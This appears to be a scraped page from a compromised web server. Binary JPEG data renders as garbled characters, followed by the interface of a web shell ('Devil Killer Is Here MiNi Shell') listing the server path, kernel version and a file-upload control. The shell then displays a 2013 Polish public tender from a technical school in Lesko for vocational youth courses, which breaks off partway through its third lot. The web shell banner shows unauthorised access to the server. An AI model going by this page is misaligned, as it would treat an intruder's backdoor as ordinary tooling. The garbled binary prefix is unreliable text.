JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130219/71010-N-2013.html

<p class="kh_header"><b>Lesko: Organizacja kursów i szkoleń dla młodzieży z Zespołu Szkół Technicznych w Lesku</b><br>
<b>Numer ogłoszenia: 71010 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Technicznych , al. Jana Pawła II 18 a, 38-600 Lesko, woj. podkarpackie, tel. 13 4696673, faks 13 4696673.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zst.lesko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka oświatowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja kursów i szkoleń dla młodzieży z Zespołu Szkół Technicznych w Lesku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na organizacji kursów i szkoleń dla młodzieży z Zespołu Szkół Technicznych w ramach projektu pt Podkarpacie stawia na zawodowców współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Program Operacyjny Kapitał Ludzki Priorytet IX, Działanie 9.2.
1.	Kurs Profesjonalnego recepcjonisty z modułem obsługi hotelowego systemu komputerowego Fidelio Suite.
2.	Kurs Kucharza kuchni regionalnej z modułem przedsiębiorczości.
3.	Kurs Barmańsko- Kelnerski.
4.	Kurs Florystyczny I Stopnia.
5.	Organizacja kursu Kasjer fakturzysta z obsługą kas fiskalnych i programów użytkowych  handlu.
6.	Organizacja kursu zakładania i urządzania terenów zieleni.
7.	Kurs fotografii i grafiki komputerowej dla zaawansowanych.
8.	Kurs Rzeźby i Działań Przestrzennych.
 
Zamawiający wymaga aby zajęcia szkoleniowe prowadziła wykwalifikowana kadra dydaktyczna  o kwalifikacjach i doświadczeniach  odpowiednich do prowadzonych kursów i szkoleń. Wykonawca w opracowanych  programach szkolenia powinien wykorzystać standardy kwalifikacji zawodowych . Wykonawca który zostanie wyłoniony w postępowaniu  przedłoży jako załącznik do umowy szkoleniowej plan nauczania/szkolenia zawierający nazwę i zakres szkolenia , czas trwania i sposób organizacji szkolenia, cele szkolenia, opis  treści  szkolenia w zakresie poszczególnych zajęć  edukacyjnych.
Zamawiający zabezpiecza sale wykładowe na realizacje kursów.
Wykonawca jest zobowiązany do
- przekazania każdemu uczestnikowi materiałów szkoleniowych dydaktycznych  niezbędnych do przeprowadzenia szkolenia 
-realizacji Przedmiotu zamówienia w formie wykładów, pokazów oraz ćwiczeń i zadań praktycznych kształtujących i doskonalących nabyte umiejętności, 
-zapewnienia sprzętu niezbędnego do należytej realizacji przedmiotu 
-bieżącego informowania Zamawiającego o przypadkach nieobecności uczestników na Zajęciach,
-ponoszenia wszelkich kosztów niezbędnych w celu prawidłowej realizacji Przedmiotu zamówienia, nieprzewidzianych w umowie, 
-złożenia Zamawiającemu w terminie 7 dni po zakończeniu realizacji Przedmiotu zamówienia: dziennika zajęć, kompletu list obecności, potwierdzenia odbioru materiałów szkoleniowych,1 egzemplarza materiałów szkoleniowych lub kserokopii, zaświadczeń/certyfikatów ukończenia Kursu lub  kserokopii w/w zaświadczeń/ certyfikatów, kserokopii ubezpieczenia NNW opis szczegółowy zawiera załącznik nr 6 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.21.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium
Ustala się wadium na wysokości  4 000,00 ( słownie: cztery tysiące złotych ) z podziałem dla każdej z części przedmiotu zamówienia: 
I część wadium   1 500,00 zł 
II część  wadium  2 000,00 zł
III część  wadium  500,00 zł 

Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
- w pieniądzu, przelewem na rachunek bankowy: 
PBS O/Lesko 48 8642 1012 2003 1213 1194 0004 
z adnotacją: przetarg na kursy i szkolenia  ZST w Lesku  (numer  części zamówienia, na którą zostaje złożona oferta). 

-w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
-w gwarancjach bankowych, 
-w gwarancjach ubezpieczeniowych 
- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) w terminie 2013-02-27, sposób przekazania: dołączyć do oferty
Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie przedłożenia przez Wykonawcę w ofercie załączników na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie przedłożenia przez Wykonawcę w ofercie załączników na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie przedłożenia przez Wykonawcę w ofercie załączników na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie przedłożenia przez Wykonawcę w ofercie załączników na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie przedłożenia przez Wykonawcę w ofercie załączników na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może ulec zmianie w wyniku wystąpienia następujących okoliczności 
-zmiana kadry realizującej kurs w wyniku nieprzewidywalnych zdarzeń losowych (np. choroba, śmierć, rozwiązanie stosunku pracy), których nie można było przewidzieć w dniu zawarcia umowy, pod warunkiem, że nowo wskazany wykładowca będzie posiadał wykształcenie i doświadczenie w zakresie przeprowadzonych szkoleń z tematu objętego zamówieniem 
-zmiana miejsca wykonywania zamówienia (szkolenia) pod warunkiem, że nowe miejsce wykonania  zamówienia zlokalizowane zostanie w miejscu równoważnym lub korzystniejszym dla.
-zmiana terminu przeprowadzenia szkolenia z przyczyn niezawinionych przez Wykonawcę, z zastrzeżeniem, że zmianie nie może ulec termin wykonania zamówienia określony w SIWZ  
Zmiana umowy dokonuje się w trybie aneksu do umowy podpisanej przez Zamawiającego i Wykonawcę w szczególności w sytuacji wystąpienia okoliczności ,których nie można było przewidzieć w chwili zawarcia umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zst.lesko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> zst.lesko@op.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2013 godzina 10:00, miejsce: Zespół Szkół Technicznych 
38-600 Lesko; al. Jana Pawła II 18 a; Sekretariat szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 28.03.2013.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Działanie w ramach projektu pt Podkarpacie stawia na zawodowców współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Program Operacyjny Kapitał Ludzki Priorytet IX, Działanie 9.2..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kursy i szkolenia ogólne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -Kurs Profesjonalnego recepcjonisty z modułem obsługi hotelowego systemu komputerowego Fidelio Suite.
-Kurs Kucharza kuchni regionalnej z modułem przedsiębiorczości.
-Kurs Barmańsko- Kelnerski. 
-Kursu Kasjer fakturzysta z obsługą kas fiskalnych i programów użytkowych  handlu. 
-Kurs Florystyczny I Stopnia.

Zamawiający wymaga aby zajęcia szkoleniowe prowadziła wykwalifikowana kadra dydaktyczna  o kwalifikacjach i doświadczeniach  odpowiednich do prowadzonych kursów i szkoleń. Wykonawca w opracowanych  programach szkolenia powinien wykorzystać standardy kwalifikacji zawodowych . Wykonawca który zostanie wyłoniony w postępowaniu  przedłoży jako załącznik do umowy szkoleniowej plan nauczania/szkolenia zawierający nazwę i zakres szkolenia , czas trwania i sposób organizacji szkolenia, cele szkolenia, opis  treści  szkolenia w zakresie poszczególnych zajęć  edukacyjnych.
Zamawiający zabezpiecza sale wykładowe na realizacje kursów.
Wykonawca jest zobowiązany do
- przekazania każdemu uczestnikowi materiałów szkoleniowych dydaktycznych  niezbędnych do przeprowadzenia szkolenia 
-realizacji Przedmiotu zamówienia w formie wykładów, pokazów oraz ćwiczeń i zadań praktycznych kształtujących i doskonalących nabyte umie-jętności, 
-zapewnienia sprzętu niezbędnego do należytej realizacji przedmiotu 
-bieżącego informowania Zamawiającego o przypadkach nieobecności uczestników na Zajęciach,
-ponoszenia wszelkich kosztów niezbędnych w celu prawidłowej realizacji Przedmiotu zamówienia, nieprzewidzianych w umowie, 
-złożenia Zamawiającemu w terminie 7 dni po zakończeniu realizacji Przedmiotu zamówienia: dziennika zajęć, kompletu list obecności, potwierdzenia odbioru materiałów szkoleniowych,1 egzemplarza materiałów szkoleniowych lub kserokopii, zaświadczeń/certyfikatów ukończenia Kursu lub  kserokopii w/w zaświadczeń/ certyfikatów, kserokopii ubezpieczenia NNW

Kurs Profesjonalnego recepcjonisty z modułem obsługi hotelowego systemu komputerowego Fidelio Suite
Opis przedmiotu zamówienia           . 
Uzasadnienie:  uprawnienia nabywane podczas kursu umożliwią absolwentom lepszy start na rynku pracy.
 Szczegóły organizacyjne: Szkolenie będzie prowadzone w postaci wykładów i warsztatów przy wykorzystaniu nowoczesnych technik prezentacji (prezentacje multimedialna, pokazy filmów, scenki i gry symulacyjne) wraz z praktycznym wykorzystaniem nowoczesnego programu komp. usprawniającego funkcjonowanie największych sieci hotelowych. Rezultat szkolenia otrzymanie przez szkołę licencji profesjonalnego systemu hotelowego. 1 grupa 15 osobowa (120 godzin)


Nazwa zadania: 
Kurs Kucharza kuchni regionalnej z modułem przedsiębiorczości
Opis przedmiotu zamówienia           .
 Uzasadnienie:  Uprawnienia nabywane podczas kursu umożliwią absolwentom lepszy start na rynku pracy
Szczegóły organizacyjne: Szkolenie będzie prowadzone w postaci zajęć teoretycznych (technika prezentacji) i praktycznych w czasie których uczestnicy będą przyrządzać dania regionalne popularne wśród turystów. W ramach kursu będą kształtowane postawy społeczne takie jak: współdziałanie  odpowiedzialność, tolerancja, akceptacja, zdrowa rywalizacja. Ważnym elementem będzie cykliczność zajęć, która wzmocni kwalifikacje zawodowe, procesy integracyjne i umiejętności społeczne.1 grupa 20 osobowa ( 80 godzin )


Nazwa zadania: 
Kurs Barmańsko- Kelnerski
Opis przedmiotu zamówienia           
Uzasadnienie:  uprawnienia nabywane podczas kursu umożliwią absolwentom lepszy start na rynku pracy 
Szczegóły organizacyjne:
Zorganizowanie kursów barmańsko-kelnerskich z modułem aktywnego poszukiwania pracy na terenie szkoły9pracownia WGD-120 h zajęć prze-prowadzonych w ciągu 25 dni nauki roboczych 1 grupa 15 osobowa ( 120 godzin )

Nazwa zadania: 
Organizacja kursu Kasjer fakturzysta z obsługą kas fiskalnych i programów użytkowych  handlu
Opis przedmiotu zamówienia           
Szczegóły organizacyjne: Podczas zajęć praktycznych uczestnicy ćwiczą przy samodzielnych stanowiskach, używając nowych typów kas fiskalnych oraz programów użytkowych Subiekt GT i Symfonia Handel. 
Na zakończenie uczestnicy otrzymują certyfikat o ukończeniu kursu Kasjer fakturzysta z obsługą kas fiskalnych i programów użytkowych w handlu.
1 grupa 10 osób (100 godzin)


Nazwa zadania: 
Kurs Florystyczny I Stopnia
Opis przedmiotu zamówienia           
Szczegóły organizacyjne: szkolenie przeprowadzone na terenie szkoły. 
W trakcie kursu florystycznego zapoznajemy słuchaczy ze sztuką układania kwiatów oraz zasadami prowadzenia kwiaciarni i obsługi klientów.  Czas trwania: 11 dni szkoleniowych. 
Ocena końcowa wystawiana jest na postawie kompozycji wykonywanych w czasie trwania kursu. Uczestnicy mają zapewniony materiał roślinny, sprzęt i akcesoria florystyczne do pracy na zajęciach.
W trakcie kursu realizowane będą działania wykraczające poza programy nauczania w szkole.1 grupa średnio 15 osób (11 dni).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.21.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kursy i szkolenia specjalistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kursu zakładania i urządzania terenów zieleni.Zamawiający wymaga aby zajęcia szkoleniowe prowadziła wykwalifikowana kadra dydaktyczna  o kwalifikacjach i doświadczeniach  odpowiednich do prowadzonych kursów i szkoleń. Wykonawca w opracowanych  programach szkolenia powinien wykorzystać standardy kwalifikacji zawodowych . Wykonawca który zostanie wyłoniony w postępowaniu  przedłoży jako załącznik do umowy szkoleniowej plan nauczania/szkolenia zawierający nazwę i zakres szkolenia , czas trwania i sposób organizacji szkolenia, cele szkolenia, opis  treści  szkolenia w zakresie poszczególnych zajęć  edukacyjnych.
Zamawiający zabezpiecza sale wykładowe na realizacje kursów.
Wykonawca jest zobowiązany do
- przekazania każdemu uczestnikowi materiałów szkoleniowych dydaktycznych  niezbędnych do przeprowadzenia szkolenia 
-realizacji Przedmiotu zamówienia w formie wykładów, pokazów oraz ćwiczeń i zadań praktycznych kształtujących i doskonalących nabyte umie-jętności, 
-zapewnienia sprzętu niezbędnego do należytej realizacji przedmiotu 
-bieżącego informowania Zamawiającego o przypadkach nieobecności uczestników na Zajęciach,
-ponoszenia wszelkich kosztów niezbędnych w celu prawidłowej realizacji Przedmiotu zamówienia, nieprzewidzianych w umowie, 
-złożenia Zamawiającemu w terminie 7 dni po zakończeniu realizacji Przedmiotu zamówienia: dziennika zajęć, kompletu list obecności, potwierdzenia odbioru materiałów szkoleniowych,1 egzemplarza materiałów szkoleniowych lub kserokopii, zaświadczeń/certyfikatów ukończenia Kursu lub  kserokopii w/w zaświadczeń/ certyfikatów, kserokopii ubezpieczenia NNW.
Opis przedmiotu zamówienia           
Uzasadnienie: Celem szkolenia jest uzyskanie przez uczestników szkolenia wiedzy i umiejętności praktycznych, niezbędnych do wykonywania prac przy zakładaniu i pielęgnowaniu terenów zieleni oraz do opracowywania projektów dekoracji roślinnych, two-rzenia różnych form kompozycji roślinnych, przygotowywania kompleksowego wystroju wnętrz oraz otwartej przestrzeni z użyciem materiału roślinnego. 
Szkolenie obejmie tworzenie ścieżek edukacyjnych połączonych z zajęciami praktycznymi (60 godzin dla każdej grupy) dla uczest-ników działania. 
Uprawnienia nabywane podczas kursu umożliwią absolwentom lepszy start na rynku pracy. W późniejszym okresie powyższe ścieżki będą wykorzystywane na zajęciach lekcyjnych oraz praktycznych, co długookresowo pozytywnie wpłynie na efektywność procesu edukacyjnego.
Szczegóły organizacyjne: W ramach zadania zostaną wykonane różne elementy zagospodarowania terenów zieleni wraz z obiektami architektury krajobrazu, które będą w przyszłości stanowić bazę dydaktyczną do kształcenia praktycznego dla Technikum 1 grupa 15 osób (60 godzin).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.21.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kursy i szkolenia -zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs fotografii i grafiki komputerowej dla zaawansowanych.
-Kurs Rzeźby i Działań Przestrzennych.
